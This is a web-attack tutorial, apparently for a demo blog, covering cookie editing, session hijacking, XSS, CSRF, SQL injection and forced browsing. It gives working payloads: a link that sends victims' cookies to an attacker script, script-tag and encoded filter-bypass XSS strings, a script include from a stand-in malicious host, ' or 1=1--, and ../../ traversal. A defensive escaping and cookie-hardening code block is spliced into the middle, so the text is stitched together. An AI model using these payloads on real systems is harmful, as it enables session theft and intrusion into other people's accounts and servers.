Cookies, Code Injection and Session Hijacking

Code Injection: 

There are many ways to inject code; let's begin this section with cookie viewing and editing. Erase everything in your address bar and type in: javascript:alert(document.cookie);

Carefully examine the data.

Now erase everything again and type: javascript: void(document.cookie='user:=guest');

Run the original script again to view the cookie; as you can see, you have changed the cookie data. This is how cookie editing can possibly be used to access a site through its cookies. There are many tools that can help automate this process, such as Paros Proxy, Burp Suite, and WebScarab, to name a few.

There are better ways to achieve this in a more targeted manner. Let's move on.


Session Hijacking:

Let's revisit the blog and see what we can do.

1) Open a different web browser and point it to the main page.

2) Log in to the anonymous account with the attack browser and create a post containing a hyperlink that points to the cookie-stealing code I have created; the file is named cookieMonster.php. The XSS link should look like this: <a onclick="javascript:document.location='/ghost/cookieMonster.php?monster='+document.cookie;">Pics</a>

3) Log in as the administrator with the victim browser, view the post and click on the hyperlink.

4) Go back to the attacker's browser and open mycookies.html.

As you can see, a new session has been logged. Take the JavaScript from that page and insert it into the address bar. Go back to the blog and post a new message; as you can see, you are now the administrator. This example differs from real-world cases in that the session and cookie values used for user authentication are usually either randomly generated or derived from a mathematical algorithm. There are programs that attempt to predict a user's next session ID.





Let's start by using XSS!


There are many different XSS and CSRF attacks that can be used; let's start with the easy ones.


1) <script>alert('xss');</script>

2) <script>alert(document.cookie);</script>

3) <IMG SRC="javascript:alert('xss');">

4) Encoded for filter bypass:

%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2fscript%3E


Now CSRF!


1) <script src="http://yourMaliciousCodeSite.com"></script>

2) <img src="http://some site you want to grab from">

3) <img src="http://a vulnerable site you want another user to inject to">
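The XSS list above, the "encoded for filter bypass" variant, and the cookieMonster.php theft from the session hijacking section all exploit the same two server-side gaps. The following is an added example, not code from the original post: it shows why a naive `<script` blocklist fails against the encoded payload, how decode-then-escape rendering neutralises every listed payload, and how the HttpOnly and SameSite cookie attributes blunt document.cookie theft and the `<img>`/`<script>` CSRF requests. The function names and sample payloads are constructed for this example.

```javascript
// Constructed sample payloads, mirroring the ones listed in the post.
const samplePayloads = [
  "<script>alert('xss');</script>",
  "<script>alert(document.cookie);</script>",
  "<IMG SRC=\"javascript:alert('xss');\">",
  "%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2fscript%3E",
];

// Naive blocklist filter of the kind the encoded payload defeats.
// Returns true when the input is "allowed"; it never sees "<script" in the %3C form.
function naiveFilter(input) {
  return !/<script/i.test(input);
}

// Context-aware HTML escaping for text placed inside an element body:
// every character that can open markup or break out of an attribute becomes an entity.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "/": "&#x2F;" };
  return s.replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Canonicalise first (one URL-decode), then escape. Escaping before decoding,
// or decoding the escaped output later, would re-open the hole the blocklist leaves.
function renderPostBody(untrusted) {
  let decoded = untrusted;
  try {
    decoded = decodeURIComponent(untrusted);
  } catch (_) {
    // Malformed %xx sequence (e.g. a literal "100% sure"): keep the raw text.
  }
  return escapeHtml(decoded);
}

// Session cookie attributes: HttpOnly stops document.cookie from reading the value
// (so the cookieMonster-style link has nothing to exfiltrate), SameSite=Lax keeps the
// cookie off cross-site <img>/<script> sub-requests, Secure keeps it off plain HTTP.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// True if rendered output still contains raw angle brackets, i.e. live markup.
function outputContainsMarkup(rendered) {
  return /[<>]/.test(rendered);
}
```

Applied at render time, `renderPostBody` turns each payload into inert text, so the same blog post that carried the cookie-stealing link would display the link as literal characters instead of executing it.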


There are three ways to access this site:


1) Sql Injection - ' or 1=1--

Through the right query string with SQL injection, you should be able to dump the user:pass combination from the server, or log in as admin.


2) Forced Browsing - ../../

The use of forced browsing is very common against servers that have not been secured properly. Sometimes you can find a text file containing sensitive information, or even reach htdocs on a Linux box. This site was set up for demonstration purposes; the file is located in the folder named "pass".


3) Examine the code to see if you can find any hints.

Many times developers leave pertinent information inside the code because they are rushed and forget to remove comments. Another possibility is that they hard-coded certain information that can be useful for an attack. Always examine the code to look for clues.

